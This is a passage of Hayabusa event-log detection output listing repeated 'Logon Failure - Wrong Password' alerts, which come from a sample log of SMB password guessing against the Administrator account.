NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: 